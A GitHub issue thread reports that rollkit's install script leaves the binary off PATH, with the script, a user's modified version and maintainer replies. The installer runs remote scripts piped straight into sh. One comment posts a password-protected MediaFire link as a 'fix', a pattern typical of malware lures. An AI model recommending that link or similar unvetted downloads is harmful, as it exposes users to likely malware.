### ISSUE TITLE
Quick Start Guide - install script does not add rollkit to PATH

### ISSUE THREAD

**Issue by twilwa** [rollkit/rollkit#1823]
### Version of Git SHA

none

### System OS

pop! os

### Installed tools

go

### Steps to reproduce it

curl -sSL https://rollkit.dev/install.sh | sh -s v0.13.6

### Expected result

To install Rollkit, run the following command in your terminal:

bash
curl -sSL https://rollkit.dev/install.sh | sh -s v0.13.6
Verify the installation by checking the Rollkit version:

bash
rollkit version
A successful installation will display the version number and its associated git commit hash.

expected: rollkit prints version

### Actual result

rollkit: command not found

### Relevant log output

```Shell
#!/bin/bash

echo "Downloading Rollkit source code..."
git clone https://github.com/rollkit/rollkit.git

if ! which go > /dev/null; then
        echo "Go is not installed. Attempting to install Go..."
        curl -sL "https://rollkit.dev/install-go.sh" | sh -s "go1.22.2"
fi

cd rollkit || { echo "Failed to find the downloaded repository."; exit 1; }
git fetch && git checkout $1
echo "Building and installing Rollkit..."
make install
cd ..
echo "Installation completed successfully."


When typing the curl command directly to look at the script, I don't see anything that would add rollkit to PATH.
```

### Notes

I've corrected the issue on my machine by modifying the script as follows, just not sure which repo the docs are in otherwise i'd PR it.
```
#!/bin/bash

echo "Downloading Rollkit source code..."
git clone https://github.com/rollkit/rollkit.git
if ! which go > /dev/null; then
    echo "Go is not installed. Attempting to install Go..."
    curl -sL "https://rollkit.dev/install-go.sh" | sh -s "go1.22.2"
    # Source the updated profile to include Go in the current session
    source ~/.profile
fi

cd rollkit || { echo "Failed to find the downloaded repository."; exit 1; }
git fetch && git checkout $1

echo "Building and installing Rollkit..."
make install

# Add Go bin directory to PATH if not already present
if [[ ":$PATH:" != *":$HOME/go/bin:"* ]]; then
    echo 'export PATH=$PATH:$HOME/go/bin' >> ~/.bashrc
    echo 'export PATH=$PATH:$HOME/go/bin' >> ~/.profile
    # Update PATH for the current session
    export PATH=$PATH:$HOME/go/bin
fi

cd ..
echo "Installation completed successfully."
echo "Please run 'source ~/.bashrc' or start a new terminal session to use Rollkit."
```

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by tzdybal** [comment]
Thanks for reporting the issue & finding the solution!

You're right, `$GOPATH/bin` was not in `$PATH`. In my opinion this is a part of "go installation" / system configuration and not rollkit script. This is especially true because you had to make extra assumptions, and it's hard to implement the script without them.

For example, you assumed that bash is used (and there are many more shells), `$HOME/go/bin` is not always true -`$(go env GOPATH)/bin` is more generic way to specify this. Adding to both `.profile` and `.bashrc` files is redundant.

I would prefer not to modify personal "dot-files" during rollkit installation script - in my opinion this is too intrusive. But maybe we should mention this somewhere in the docs.

**Comment by Manav-Aggarwal** [comment]
Thanks for opening this @twilwa! Did you try running 'source ~/.bashrc' after installation as the script mentions?

**Comment by twilwa** [comment]
I don't recall exactly, but I beleive the docs say to start a new terminal session at some point, which I beleive was what I did (but it's been a while.) I'm relatively familiar with 'source' command behavior so i'd guess that i did, but don't remember specifically, lol.

I think either docs or modifying the script is probably in order -- modifying dotfiles to export PATH, in my experience, is often listed as an addendum in the installation section, i.e 'export gopath to make sure it works for this session, add the export to .bashrc if you'd like it to always work' is something I often see in docs. Also note that the 'source bashrc after installation' is a message from my script, not the one in the docs -- might be a good addition as well.

I'll leave it open in case you folks need it for tracking but feel free to close, I resolved it for myself as described above.
